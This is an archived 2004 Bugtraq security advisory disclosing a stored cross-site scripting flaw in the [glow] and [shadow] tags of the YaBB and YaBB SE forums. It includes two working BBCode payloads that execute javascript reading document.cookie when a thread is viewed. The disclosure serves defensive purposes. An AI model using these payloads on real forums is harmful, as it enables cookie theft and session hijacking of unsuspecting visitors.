lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040314075207.445.qmail@www.securityfocus.com>
Date: 14 Mar 2004 07:52:07 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: YaBB/YaBBse Cross Site Scripting Vulnerability





#####################################################################

 Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability
  Release Date : Mar 14,2004 
   Application : YaBB/YaBBse
       Test On : YaBB 1 Gold(SP1.3)
                 YaBB SE 1.5.1 Final
    Vendor URL : http://www.yabbforum.com/
                 http://www.yabbse.org/
      Discover : Cheng Peng Su(apple_soup_at_msn.com)
     
#####################################################################

  Proof of conecpt:
      The problem is in [glow] and [shadow] tag,yabb doesn't filter
   the charactor in this tag,attack needn't visitor to click any 
   links,just when the vistor read the thread,XSS code will be 
   executed.
  
  Exploit:
   [glow=red);background:url(javascript:alert(document.cookie));filte
   r:glow(color=red,2,300]Big Exploit[/glow]
   [shadow=red);background:url(javascript:alert(document.cookie));fil
   ter:shadow(color=red,left,300]Big Exploit[/shadow]
   
  Contact:
   Cheng Peng Su
   Class 1,Senior 2,High school attached to Wuhan University
   Wuhan,Hubei,China(430072)
   apple_soup_at_msn.com
   
      
 
   


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ